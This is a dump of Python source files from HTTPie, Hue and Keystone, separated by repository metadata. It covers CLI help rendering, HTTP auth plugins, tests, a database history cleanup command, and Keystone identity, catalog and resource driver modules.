[MAN_COMMAND, MAN_PAGE_SECTION, program],
shell=False,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
except Exception:
# There might be some errors outside of the process, e.g
# a permission error to execute something that is not an
# executable.
return False
else:
return process.returncode == 0
def display_for(env: Environment, program: str) -> None:
"""Display the man page for the given command (http/https)."""
subprocess.run(
[MAN_COMMAND, MAN_PAGE_SECTION, program],
stdout=env.stdout,
stderr=env.stderr
)
```
#### File: output/ui/rich_help.py
```python
import re
import textwrap
from typing import AbstractSet, Iterable, Optional, Tuple
from rich.console import RenderableType
from rich.highlighter import RegexHighlighter
from rich.padding import Padding
from rich.table import Table
from rich.text import Text
from httpie.cli.constants import SEPARATOR_GROUP_ALL_ITEMS
from httpie.cli.options import Argument, ParserSpec, Qualifiers
from httpie.output.ui.palette import GenericColor
SEPARATORS = '|'.join(map(re.escape, SEPARATOR_GROUP_ALL_ITEMS))
STYLE_METAVAR = GenericColor.YELLOW
STYLE_SWITCH = GenericColor.GREEN
STYLE_PROGRAM_NAME = GenericColor.GREEN # .boldify()
STYLE_USAGE_OPTIONAL = GenericColor.GREY
STYLE_USAGE_REGULAR = GenericColor.WHITE
STYLE_USAGE_ERROR = GenericColor.RED
STYLE_USAGE_MISSING = GenericColor.YELLOW
STYLE_BOLD = 'bold'
MAX_CHOICE_CHARS = 80
LEFT_PADDING_2 = (0, 0, 0, 2)
LEFT_PADDING_3 = (0, 0, 0, 3)
LEFT_PADDING_4 = (0, 0, 0, 4)
LEFT_PADDING_5 = (0, 0, 0, 5)
LEFT_INDENT_2 = (1, 0, 0, 2)
LEFT_INDENT_3 = (1, 0, 0, 3)
LEFT_INDENT_BOTTOM_3 = (0, 0, 1, 3)
MORE_INFO_COMMANDS = """
To learn more, you can try:
-> running 'http --manual'
-> visiting our full documentation at https://httpie.io/docs/cli
"""
class OptionsHighlighter(RegexHighlighter):
highlights = [
r'(^|\W)(?P<option>\-{1,2}[\w|-]+)(?![a-zA-Z0-9])',
r'(?P<bold>HTTPie)',
]
options_highlighter = OptionsHighlighter()
def unpack_argument(
argument: Argument,
) -> Tuple[Text, Text]:
opt1 = opt2 = ''
style = None
if argument.aliases:
if len(argument.aliases) >= 2:
opt2, opt1 = argument.aliases
else:
(opt1,) = argument.aliases
else:
opt1 = argument.metavar
style = STYLE_USAGE_REGULAR
return Text(opt1, style=style), Text(opt2)
def to_usage(
spec: ParserSpec,
*,
program_name: Optional[str] = None,
whitelist: AbstractSet[str] = frozenset()
) -> RenderableType:
shown_arguments = [
argument
for group in spec.groups
for argument in group.arguments
if (not argument.aliases or whitelist.intersection(argument.aliases))
]
# Sort the shown_arguments so that --dash options are
# shown first
shown_arguments.sort(key=lambda argument: argument.aliases, reverse=True)
text = Text(program_name or spec.program, style=STYLE_BOLD)
for argument in shown_arguments:
text.append(' ')
is_whitelisted = whitelist.intersection(argument.aliases)
if argument.aliases:
name = '/'.join(sorted(argument.aliases, key=len))
else:
name = argument.metavar
nargs = argument.configuration.get('nargs')
if nargs is Qualifiers.OPTIONAL:
text.append('[' + name + ']', style=STYLE_USAGE_OPTIONAL)
elif nargs is Qualifiers.ZERO_OR_MORE:
text.append(
'[' + name + ' ...]',
style=STYLE_USAGE_OPTIONAL,
)
else:
text.append(
name,
style=STYLE_USAGE_ERROR
if is_whitelisted
else STYLE_USAGE_REGULAR,
)
raw_form = argument.serialize()
if raw_form.get('choices'):
text.append(' ')
text.append(
'{' + ', '.join(raw_form['choices']) + '}',
style=STYLE_USAGE_MISSING,
)
return text
# This part is loosely based on the rich-click's help message
# generation.
def to_help_message(
spec: ParserSpec,
) -> Iterable[RenderableType]:
yield Padding(
options_highlighter(spec.description),
LEFT_INDENT_2,
)
yield Padding(
Text('Usage', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(to_usage(spec), LEFT_INDENT_3)
group_rows = {}
for group in spec.groups:
options_rows = []
for argument in group.arguments:
if argument.is_hidden:
continue
opt1, opt2 = unpack_argument(argument)
if opt2:
opt1.append('/')
opt1.append(opt2)
# Column for a metavar, if we have one
metavar = Text(style=STYLE_METAVAR)
metavar.append(argument.configuration.get('metavar', ''))
if opt1 == metavar:
metavar = Text('')
raw_form = argument.serialize()
desc = raw_form.get('short_description', '')
if raw_form.get('choices'):
desc += ' (choices: '
desc += textwrap.shorten(
', '.join(raw_form.get('choices')),
MAX_CHOICE_CHARS,
)
desc += ')'
rows = [
Padding(
options_highlighter(opt1),
LEFT_PADDING_2,
),
metavar,
options_highlighter(desc),
]
options_rows.append(rows)
if argument.configuration.get('nested_options'):
options_rows.extend(
[
(
Padding(
Text(
key,
style=STYLE_USAGE_OPTIONAL,
),
LEFT_PADDING_4,
),
value,
dec,
)
for key, value, dec in argument.nested_options
]
)
group_rows[group.name] = options_rows
options_table = Table(highlight=False, box=None, show_header=False)
for group_name, options_rows in group_rows.items():
options_table.add_row(Text(), Text(), Text())
options_table.add_row(
Text(group_name, style=STYLE_SWITCH),
Text(),
Text(),
)
options_table.add_row(Text(), Text(), Text())
for row in options_rows:
options_table.add_row(*row)
yield Padding(
Text('Options', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(options_table, LEFT_PADDING_2)
yield Padding(
Text('More Information', style=STYLE_SWITCH),
LEFT_INDENT_2,
)
yield Padding(
MORE_INFO_COMMANDS.rstrip('\n'),
LEFT_PADDING_3
)
yield Padding(
spec.epilog.rstrip('\n'),
LEFT_INDENT_BOTTOM_3,
)
```
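A sketch of rendering the help: `to_help_message` yields rich renderables, so they can be fed straight into a `Console`. Note it reads `spec.description` and `spec.epilog` unconditionally, so both must be set; the spec below is a stand-in, not HTTPie's real one.
```python
from rich.console import Console
spec = ParserSpec('demo', description='Demo parser.', epilog='See the docs.')
spec.add_group('General').add_argument(
    '--verbose', action='store_true', short_help='Verbose output.')
console = Console()
for renderable in to_help_message(spec.finalize()):
    console.print(renderable)
```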
#### File: httpie/plugins/builtin.py
```python
from base64 import b64encode
import requests.auth
from .base import AuthPlugin
# noinspection PyAbstractClass
class BuiltinAuthPlugin(AuthPlugin):
package_name = '(builtin)'
class HTTPBasicAuth(requests.auth.HTTPBasicAuth):
def __call__(
self,
request: requests.PreparedRequest
) -> requests.PreparedRequest:
"""
Override username/password serialization to allow unicode.
See https://github.com/httpie/httpie/issues/212
"""
# noinspection PyTypeChecker
request.headers['Authorization'] = type(self).make_header(
self.username, self.password).encode('latin1')
return request
@staticmethod
def make_header(username: str, password: str) -> str:
credentials = f'{username}:{password}'
token = b64encode(credentials.encode()).strip().decode('latin1')
return f'Basic {token}'
class HTTPBearerAuth(requests.auth.AuthBase):
def __init__(self, token: str) -> None:
self.token = token
def __call__(self, request: requests.PreparedRequest) -> requests.PreparedRequest:
request.headers['Authorization'] = f'Bearer {self.token}'
return request
class BasicAuthPlugin(BuiltinAuthPlugin):
name = 'Basic HTTP auth'
auth_type = 'basic'
netrc_parse = True
# noinspection PyMethodOverriding
def get_auth(self, username: str, password: str) -> HTTPBasicAuth:
return HTTPBasicAuth(username, password)
class DigestAuthPlugin(BuiltinAuthPlugin):
name = 'Digest HTTP auth'
auth_type = 'digest'
netrc_parse = True
# noinspection PyMethodOverriding
def get_auth(
self,
username: str,
password: str
) -> requests.auth.HTTPDigestAuth:
return requests.auth.HTTPDigestAuth(username, password)
class BearerAuthPlugin(BuiltinAuthPlugin):
name = 'Bearer HTTP Auth'
auth_type = 'bearer'
netrc_parse = False
auth_parse = False
# noinspection PyMethodOverriding
    def get_auth(self, **kwargs) -> HTTPBearerAuth:
return HTTPBearerAuth(self.raw_auth)
```
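A worked example for the Basic scheme above: the header is just the base64 encoding of `username:password`.
```python
header = HTTPBasicAuth.make_header('user', 'password')
assert header == 'Basic dXNlcjpwYXNzd29yZA=='
```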
#### File: tests/fixtures/__init__.py
```python
import json
from pathlib import Path
from typing import Optional, Dict, Any
import httpie
from httpie.encoding import UTF8
from httpie.output.formatters.xml import pretty_xml, parse_xml
def patharg(path):
"""
Back slashes need to be escaped in ITEM args,
even in Windows paths.
"""
return str(path).replace('\\', '\\\\\\')
FIXTURES_ROOT = Path(__file__).parent
FILE_PATH = FIXTURES_ROOT / 'test.txt'
JSON_FILE_PATH = FIXTURES_ROOT / 'test.json'
JSON_WITH_DUPE_KEYS_FILE_PATH = FIXTURES_ROOT / 'test_with_dupe_keys.json'
BIN_FILE_PATH = FIXTURES_ROOT / 'test.bin'
XML_FILES_PATH = FIXTURES_ROOT / 'xmldata'
XML_FILES_VALID = list((XML_FILES_PATH / 'valid').glob('*_raw.xml'))
XML_FILES_INVALID = list((XML_FILES_PATH / 'invalid').glob('*.xml'))
SESSION_FILES_PATH = FIXTURES_ROOT / 'session_data'
SESSION_FILES_OLD = sorted((SESSION_FILES_PATH / 'old').glob('*.json'))
SESSION_FILES_NEW = sorted((SESSION_FILES_PATH / 'new').glob('*.json'))
SESSION_VARIABLES = {
'__version__': httpie.__version__,
'__host__': 'null',
}
FILE_PATH_ARG = patharg(FILE_PATH)
BIN_FILE_PATH_ARG = patharg(BIN_FILE_PATH)
JSON_FILE_PATH_ARG = patharg(JSON_FILE_PATH)
# Strip because we don't want new lines in the data so that we can
# easily count occurrences also when embedded in JSON (where the new
# line would be escaped).
FILE_CONTENT = FILE_PATH.read_text(encoding=UTF8).strip()
ASCII_FILE_CONTENT = "random text" * 10
JSON_FILE_CONTENT = JSON_FILE_PATH.read_text(encoding=UTF8)
BIN_FILE_CONTENT = BIN_FILE_PATH.read_bytes()
UNICODE = FILE_CONTENT
XML_DATA_RAW = '<?xml version="1.0" encoding="utf-8"?><root><e>text</e></root>'
XML_DATA_FORMATTED = pretty_xml(parse_xml(XML_DATA_RAW))
def read_session_file(session_file: Path, *, extra_variables: Optional[Dict[str, str]] = None) -> Any:
with open(session_file) as stream:
data = stream.read()
session_vars = {**SESSION_VARIABLES, **(extra_variables or {})}
for variable, value in session_vars.items():
data = data.replace(variable, value)
return json.loads(data)
```
#### File: httpie/tests/test_errors.py
```python
import pytest
import socket
from unittest import mock
from pytest import raises
from requests import Request
from requests.exceptions import ConnectionError
from httpie.status import ExitStatus
from .utils import HTTP_OK, http
@mock.patch('httpie.core.program')
def test_error(program):
exc = ConnectionError('Connection aborted')
exc.request = Request(method='GET', url='http://www.google.com')
program.side_effect = exc
r = http('www.google.com', tolerate_error_exit_status=True)
assert r.exit_status == ExitStatus.ERROR
error_msg = (
'ConnectionError: '
'Connection aborted while doing a GET request to URL: '
'http://www.google.com'
)
assert error_msg in r.stderr
@mock.patch('httpie.core.program')
def test_error_traceback(program):
exc = ConnectionError('Connection aborted')
exc.request = Request(method='GET', url='http://www.google.com')
program.side_effect = exc
with raises(ConnectionError):
http('--traceback', 'www.google.com')
@mock.patch('httpie.core.program')
@pytest.mark.parametrize("error_code, expected_message", [
(socket.EAI_AGAIN, "check your connection"),
(socket.EAI_NONAME, "check the URL"),
])
def test_error_custom_dns(program, error_code, expected_message):
exc = ConnectionError('Connection aborted')
exc.__context__ = socket.gaierror(error_code, "<test>")
program.side_effect = exc
r = http('www.google.com', tolerate_error_exit_status=True)
assert r.exit_status == ExitStatus.ERROR
assert expected_message in r.stderr
def test_max_headers_limit(httpbin_both):
with raises(ConnectionError) as e:
http('--max-headers=1', httpbin_both + '/get')
assert 'got more than 1 headers' in str(e.value)
def test_max_headers_no_limit(httpbin_both):
assert HTTP_OK in http('--max-headers=0', httpbin_both + '/get')
def test_response_charset_option_unknown_encoding(httpbin_both):
r = http(
'--response-charset=foobar',
httpbin_both + '/get',
tolerate_error_exit_status=True,
)
assert "'foobar' is not a supported encoding" in r.stderr
def test_response_mime_option_invalid_mime_type(httpbin_both):
r = http(
'--response-mime=foobar',
httpbin_both + '/get',
tolerate_error_exit_status=True,
)
assert "'foobar' doesn’t look like a mime type" in r.stderr
``` |
{
"source": "10088/hue",
"score": 2
} |
#### File: management/commands/desktop_document_cleanup.py
```python
import desktop.conf
import desktop.conf
import logging.handlers
import os
import sys
import time
from beeswax.models import SavedQuery
from beeswax.models import Session
from datetime import date, timedelta
from desktop.models import Document2
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db.utils import DatabaseError
from importlib import import_module
from oozie.models import Workflow
if sys.version_info[0] > 2:
from django.utils.translation import gettext_lazy as _t, gettext as _
else:
from django.utils.translation import ugettext_lazy as _t, ugettext as _
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Handler for purging old Query History, Workflow documents and Session data
"""
try:
from optparse import make_option
option_list = BaseCommand.option_list + (
make_option("--keep-days", help=_t("Number of days of history data to keep."),
action="store",
type=int,
default=30),
)
except AttributeError as e:
baseoption_test = 'BaseCommand' in str(e) and 'option_list' in str(e)
if baseoption_test:
def add_arguments(self, parser):
parser.add_argument("--keep-days", help=_t("Number of days of history data to keep."),
action="store",
type=int,
default=30)
else:
LOG.exception(str(e))
sys.exit(1)
def objectCleanup(self, objClass, filterType, filterValue, dateField):
errorCount = 0
checkCount = 0
resets = 0
deleteRecords = self.deleteRecordsBase
totalObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)
LOG.info("Looping through %s objects. %s objects to be deleted." % (objClass.__name__, totalObjects.count()))
while totalObjects.count():
if deleteRecords < 30 and resets < self.resetMax:
checkCount += 1
if checkCount == self.resetCount:
deleteRecords = self.deleteRecordsBase
resets += 1
checkCount = 0
LOG.info("%s objects left: %s" % (objClass.__name__, totalObjects.count()))
deleteObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)[:deleteRecords]
try:
objClass.objects.filter(pk__in=list(deleteObjects)).delete()
errorCount = 0
except DatabaseError as e:
LOG.info("Non Fatal Exception: %s: %s" % (e.__class__.__name__, e))
errorCount += 1
if errorCount > 9 and deleteRecords == 1:
raise
if deleteRecords > 100:
deleteRecords = max(deleteRecords - 100, 1)
else:
deleteRecords = max(deleteRecords - 10, 1)
LOG.info("Decreasing max delete records to: %s" % deleteRecords)
totalObjects = objClass.objects.filter(
**{'%s' % filterType: filterValue, '%s__lte' % dateField: self.timeDeltaObj,}) \
.values_list("id", flat=True)
def handle(self, *args, **options):
self.keepDays = options['keep_days']
self.timeDeltaObj = date.today() - timedelta(days=self.keepDays)
self.resetCount = 15
self.resetMax = 5
self.deleteRecordsBase = 999 # number of documents to delete in a batch
# to avoid Non Fatal Exception: DatabaseError: too many SQL variables
LOG.warning("HUE_CONF_DIR: %s" % os.environ['HUE_CONF_DIR'])
LOG.info("DB Engine: %s" % desktop.conf.DATABASE.ENGINE.get())
LOG.info("DB Name: %s" % desktop.conf.DATABASE.NAME.get())
LOG.info("DB User: %s" % desktop.conf.DATABASE.USER.get())
LOG.info("DB Host: %s" % desktop.conf.DATABASE.HOST.get())
LOG.info("DB Port: %s" % str(desktop.conf.DATABASE.PORT.get()))
LOG.info(
"Cleaning up anything in the Hue tables django_session, oozie*, desktop* and beeswax* older than %s old" % self.keepDays)
start = time.time()
# Clean out Hive / Impala Query History
self.objectCleanup(SavedQuery, 'is_auto', True, 'mtime')
# Clear out old Hive/Impala sessions
self.objectCleanup(Session, 'status_code__gte', -10000, 'last_used')
# Clean out Trashed Workflows
try:
self.objectCleanup(Workflow, 'is_trashed', True, 'last_modified')
except NameError as NE:
LOG.info('Oozie app is not configured to clean out trashed workflows')
# Clean out Workflows without a name
try:
self.objectCleanup(Workflow, 'name', '', 'last_modified')
except NameError as NE:
LOG.info('Oozie app is not configured to clean out workflows without a name')
# Clean out history Doc2 objects
self.objectCleanup(Document2, 'is_history', True, 'last_modified')
# Clean out expired sessions
LOG.debug("Cleaning out expired sessions from django_session table")
engine = import_module(settings.SESSION_ENGINE)
try:
engine.SessionStore.clear_expired()
except NotImplementedError:
LOG.error("Session engine '%s' doesn't support clearing "
"expired sessions.\n" % settings.SESSION_ENGINE)
end = time.time()
elapsed = (end - start)
LOG.debug("Total time elapsed (seconds): %.2f" % elapsed)
``` |
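A sketch of invoking the command programmatically through Django's management API, equivalent to running `desktop_document_cleanup --keep-days 60` from the hue CLI.
```python
from django.core.management import call_command
call_command('desktop_document_cleanup', keep_days=60)
```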
{
"source": "10088/keystone",
"score": 2
} |
#### File: keystone/api/services.py
```python
import http.client
from keystone.catalog import schema
from keystone.common import provider_api
from keystone.common import rbac_enforcer
from keystone.common import validation
from keystone.server import flask as ks_flask
ENFORCER = rbac_enforcer.RBACEnforcer
PROVIDERS = provider_api.ProviderAPIs
class ServicesResource(ks_flask.ResourceBase):
collection_key = 'services'
member_key = 'service'
def _get_service(self, service_id):
ENFORCER.enforce_call(action='identity:get_service')
return self.wrap_member(PROVIDERS.catalog_api.get_service(service_id))
def _list_service(self):
filters = ['type', 'name']
ENFORCER.enforce_call(action='identity:list_services', filters=filters)
hints = self.build_driver_hints(filters)
refs = PROVIDERS.catalog_api.list_services(hints=hints)
return self.wrap_collection(refs, hints=hints)
def get(self, service_id=None):
if service_id is not None:
return self._get_service(service_id)
return self._list_service()
def post(self):
ENFORCER.enforce_call(action='identity:create_service')
service = self.request_body_json.get('service')
validation.lazy_validate(schema.service_create, service)
service = self._assign_unique_id(self._normalize_dict(service))
ref = PROVIDERS.catalog_api.create_service(
service['id'], service, initiator=self.audit_initiator)
return self.wrap_member(ref), http.client.CREATED
def patch(self, service_id):
ENFORCER.enforce_call(action='identity:update_service')
service = self.request_body_json.get('service')
validation.lazy_validate(schema.service_update, service)
self._require_matching_id(service)
ref = PROVIDERS.catalog_api.update_service(
service_id, service, initiator=self.audit_initiator)
return self.wrap_member(ref)
def delete(self, service_id):
ENFORCER.enforce_call(action='identity:delete_service')
return PROVIDERS.catalog_api.delete_service(
service_id, initiator=self.audit_initiator), http.client.NO_CONTENT
class ServiceAPI(ks_flask.APIBase):
_name = 'services'
_import_name = __name__
resources = [ServicesResource]
resource_mapping = []
APIs = (ServiceAPI,)
```
#### File: cmd/doctor/caching.py
```python
from keystone.common import cache
import keystone.conf
CONF = keystone.conf.CONF
def symptom_caching_disabled():
"""`keystone.conf [cache] enabled` is not enabled.
Caching greatly improves the performance of keystone, and it is highly
recommended that you enable it.
"""
return not CONF.cache.enabled
def symptom_caching_enabled_without_a_backend():
"""Caching is not completely configured.
Although caching is enabled in `keystone.conf [cache] enabled`, the default
backend is still set to the no-op backend. Instead, configure keystone to
point to a real caching backend like memcached.
"""
return CONF.cache.enabled and CONF.cache.backend == 'dogpile.cache.null'
def symptom_connection_to_memcached():
"""Memcached isn't reachable.
Caching is enabled and the `keystone.conf [cache] backend` option is
configured but one or more Memcached servers are not reachable or marked
as dead. Please ensure `keystone.conf [cache] memcache_servers` is
configured properly.
"""
memcached_drivers = [
'dogpile.cache.memcached',
'oslo_cache.memcache_pool'
]
if CONF.cache.enabled and CONF.cache.backend in memcached_drivers:
cache.configure_cache()
cache_stats = cache.CACHE_REGION.actual_backend.client.get_stats()
memcached_server_count = len(CONF.cache.memcache_servers)
if len(cache_stats) != memcached_server_count:
return True
else:
return False
else:
return False
```
#### File: identity/backends/resource_options.py
```python
from keystone.common import resource_options
from keystone.common.validation import parameter_types
from keystone.i18n import _
def _mfa_rules_validator_list_of_lists_of_strings_no_duplicates(value):
# NOTE(notmorgan): This should possibly validate that the auth-types
# are enabled? For now it simply validates the following:
#
# Must be a list of lists, each sub list must be a list of strings
# e.g. [['str1', 'str2'], ['str3', 'str4']]
# No sub-list may be empty. Duplication of sub-lists and duplication of
# string elements are not permitted.
msg = _('Invalid data type, must be a list of lists comprised of strings. '
'Sub-lists may not be duplicated. Strings in sub-lists may not be '
'duplicated.')
if not isinstance(value, list):
# Value is not a List, TypeError
raise TypeError(msg)
sublists = []
for sublist in value:
# Sublist element tracker is reset for each sublist.
string_set = set()
if not isinstance(sublist, list):
# Sublist is not a List, TypeError
raise TypeError(msg)
if not sublist:
# Sublist is Empty, ValueError
raise ValueError(msg)
if sublist in sublists:
# Sublist is duplicated, ValueError
raise ValueError(msg)
# Add the sublist to the tracker
sublists.append(sublist)
for element in sublist:
if not isinstance(element, str):
# Element of sublist is not a string, TypeError
raise TypeError(msg)
if element in string_set:
# Element of sublist is duplicated, ValueError
raise ValueError(msg)
# add element to the sublist element tracker
string_set.add(element)
USER_OPTIONS_REGISTRY = resource_options.ResourceOptionRegistry('USER')
IGNORE_CHANGE_PASSWORD_OPT = (
resource_options.ResourceOption(
option_id='1000',
option_name='ignore_change_password_upon_first_use',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_PASSWORD_EXPIRY_OPT = (
resource_options.ResourceOption(
option_id='1001',
option_name='ignore_password_expiry',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_LOCKOUT_ATTEMPT_OPT = (
resource_options.ResourceOption(
option_id='1002',
option_name='ignore_lockout_failure_attempts',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
LOCK_PASSWORD_OPT = (
resource_options.ResourceOption(
option_id='1003',
option_name='lock_password',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
IGNORE_USER_INACTIVITY_OPT = (
resource_options.ResourceOption(
option_id='1004',
option_name='ignore_user_inactivity',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
MFA_RULES_OPT = (
resource_options.ResourceOption(
option_id='MFAR',
option_name='multi_factor_auth_rules',
validator=_mfa_rules_validator_list_of_lists_of_strings_no_duplicates,
json_schema_validation={
# List
'type': 'array',
'items': {
# Of Lists
'type': 'array',
'items': {
# Of Strings, each string must be unique, minimum 1
# element
'type': 'string',
},
'minItems': 1,
'uniqueItems': True
},
'uniqueItems': True
}))
MFA_ENABLED_OPT = (
resource_options.ResourceOption(
option_id='MFAE',
option_name='multi_factor_auth_enabled',
validator=resource_options.boolean_validator,
json_schema_validation=parameter_types.boolean))
# NOTE(notmorgan): wrap this in a function for testing purposes.
# This is called on import by design.
def register_user_options():
for opt in [
IGNORE_CHANGE_PASSWORD_OPT,
IGNORE_PASSWORD_EXPIRY_OPT,
IGNORE_LOCKOUT_ATTEMPT_OPT,
LOCK_PASSWORD_OPT,
IGNORE_USER_INACTIVITY_OPT,
MFA_RULES_OPT,
MFA_ENABLED_OPT,
]:
USER_OPTIONS_REGISTRY.register_option(opt)
register_user_options()
```
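A worked example of the MFA-rule validator above: each sub-list is one acceptable combination of auth methods, and duplicates at either level are rejected.
```python
_mfa_rules_validator_list_of_lists_of_strings_no_duplicates(
    [['password', 'totp'], ['password']])   # accepted
try:
    _mfa_rules_validator_list_of_lists_of_strings_no_duplicates(
        [['password'], ['password']])       # duplicated sub-list
except ValueError as exc:
    print(exc)
```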
#### File: identity/shadow_backends/base.py
```python
import abc
from keystone import exception
def federated_objects_to_list(fed_ref):
"""Create a new reformatted federated object list using the one passed in.
When returning federated objects with a user we only need the attributes
idp_id, protocol_id, and unique_id. Therefore, we pull these elements out
of the fed_ref and create a newly formatted list with the needed
information. We simply group each federated object's protocol_ids and
unique_ids under the corresponding idp_id.
:returns list: Containing the user's federated objects
"""
if not fed_ref:
return []
fed = {}
for fed_dict in fed_ref:
fed.setdefault(
fed_dict['idp_id'],
{
'idp_id': fed_dict['idp_id'],
'protocols': []
}
)['protocols'].append({
'protocol_id': fed_dict['protocol_id'],
'unique_id': fed_dict['unique_id']
})
return list(fed.values())
class ShadowUsersDriverBase(object, metaclass=abc.ABCMeta):
"""Interface description for an Shadow Users driver."""
@abc.abstractmethod
def create_federated_object(self, fed_dict):
"""Create a new federated object.
:param dict federated_dict: Reference to the federated user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_federated_user(self, domain_id, federated_dict, email=None):
"""Create a new user with the federated identity.
:param domain_id: The domain ID of the IdP used for the federated user
:param dict federated_dict: Reference to the federated user
:param email: Federated user's email
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
def delete_federated_object(self, user_id):
"""Delete a user's federated objects.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_objects(self, user_id):
"""Get all federated objects for a user.
:param user_id: Unique identifier of the user
:returns list: Containing the user's federated objects
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_federated_user(self, idp_id, protocol_id, unique_id):
"""Return the found user for the federated identity.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def update_federated_user_display_name(self, idp_id, protocol_id,
unique_id, display_name):
"""Update federated user's display name if changed.
:param idp_id: The identity provider ID
:param protocol_id: The federation protocol ID
:param unique_id: The unique ID for the user
:param display_name: The user's display name
"""
raise exception.NotImplemented()
@abc.abstractmethod
def get_user(self, user_id):
"""Return the found user.
:param user_id: Unique identifier of the user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def create_nonlocal_user(self, user_dict):
"""Create a new non-local user.
:param dict user_dict: Reference to the non-local user
:returns dict: Containing the user reference
"""
raise exception.NotImplemented()
@abc.abstractmethod
def set_last_active_at(self, user_id):
"""Set the last active at date for the user.
:param user_id: Unique identifier of the user
"""
raise exception.NotImplemented()
@abc.abstractmethod
def list_federated_users_info(self, hints=None):
"""Get the shadow users info with the specified filters.
:param hints: contains the list of filters yet to be satisfied.
Any filters satisfied here will be removed so that
the caller will know if any filters remain.
:returns list: A list of objects that containing the shadow users
reference.
"""
raise exception.NotImplemented()
```
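A worked example for `federated_objects_to_list()`: backend rows sharing an `idp_id` are grouped under a single entry, keeping only the protocol and unique IDs.
```python
rows = [
    {'idp_id': 'idp1', 'protocol_id': 'saml2', 'unique_id': 'abc'},
    {'idp_id': 'idp1', 'protocol_id': 'mapped', 'unique_id': 'def'},
]
assert federated_objects_to_list(rows) == [{
    'idp_id': 'idp1',
    'protocols': [
        {'protocol_id': 'saml2', 'unique_id': 'abc'},
        {'protocol_id': 'mapped', 'unique_id': 'def'},
    ],
}]
```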
#### File: resource/backends/base.py
```python
import abc
import keystone.conf
from keystone import exception
CONF = keystone.conf.CONF
def get_project_from_domain(domain_ref):
"""Create a project ref from the provided domain ref."""
project_ref = domain_ref.copy()
project_ref['is_domain'] = True
project_ref['domain_id'] = None
project_ref['parent_id'] = None
return project_ref
# The provided SQL driver uses a special value to represent a domain_id of
# None. See comment in Project class of resource/backends/sql.py for more
# details.
NULL_DOMAIN_ID = '<<keystone.domain.root>>'
class ResourceDriverBase(object, metaclass=abc.ABCMeta):
def _get_list_limit(self):
return CONF.resource.list_limit or CONF.list_limit
# project crud
@abc.abstractmethod
def list_projects(self, hints):
"""List projects in the system.
:param hints: filter hints which the driver should
implement if at all possible.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_from_ids(self, project_ids):
"""List projects for the provided list of ids.
:param project_ids: list of ids
:returns: a list of project_refs.
This method is used internally by the assignment manager to bulk read
a set of projects given their ids.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_project_ids_from_domain_ids(self, domain_ids):
"""List project ids for the provided list of domain ids.
:param domain_ids: list of domain ids
:returns: a list of project ids owned by the specified domain ids.
This method is used internally by the assignment manager to bulk read
a set of project ids given a list of domain ids.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_projects_in_domain(self, domain_id):
"""List projects in the domain.
:param domain_id: the driver MUST only return projects
within this domain.
:returns: a list of project_refs or an empty list.
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def get_project(self, project_id):
"""Get a project by ID.
:returns: project_ref
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def update_project(self, project_id, project):
"""Update an existing project.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
:raises keystone.exception.Conflict: if project name already exists
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def delete_project(self, project_id):
"""Delete an existing project.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented() # pragma: no cover
@abc.abstractmethod
def list_project_parents(self, project_id):
"""List all parents from a project by its ID.
:param project_id: the driver will list the parents of this
project.
:returns: a list of project_refs or an empty list.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
@abc.abstractmethod
def list_projects_in_subtree(self, project_id):
"""List all projects in the subtree of a given project.
:param project_id: the driver will get the subtree under
this project.
:returns: a list of project_refs or an empty list
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
@abc.abstractmethod
def is_leaf_project(self, project_id):
"""Check if a project is a leaf in the hierarchy.
:param project_id: the driver will check if this project
is a leaf in the hierarchy.
:raises keystone.exception.ProjectNotFound: if project_id does not
exist
"""
raise exception.NotImplemented()
def _validate_default_domain(self, ref):
"""Validate that either the default domain or nothing is specified.
Also removes the domain from the ref so that LDAP doesn't have to
persist the attribute.
"""
ref = ref.copy()
domain_id = ref.pop('domain_id', CONF.identity.default_domain_id)
self._validate_default_domain_id(domain_id)
return ref
def _validate_default_domain_id(self, domain_id):
"""Validate that the domain ID belongs to the default domain."""
if domain_id != CONF.identity.default_domain_id:
raise exception.DomainNotFound(domain_id=domain_id)
@abc.abstractmethod
def create_project(self, project_id, project):
"""Create a new project.
:param project_id: This parameter can be ignored.
:param dict project: The new project
Project schema::
type: object
properties:
id:
type: string
name:
type: string
domain_id:
type: [string, null]
description:
type: string
enabled:
type: boolean
parent_id:
type: string
is_domain:
type: boolean
required: [id, name, domain_id]
additionalProperties: true
If the project doesn't match the schema the behavior is undefined.
The driver can impose requirements such as the maximum length of a
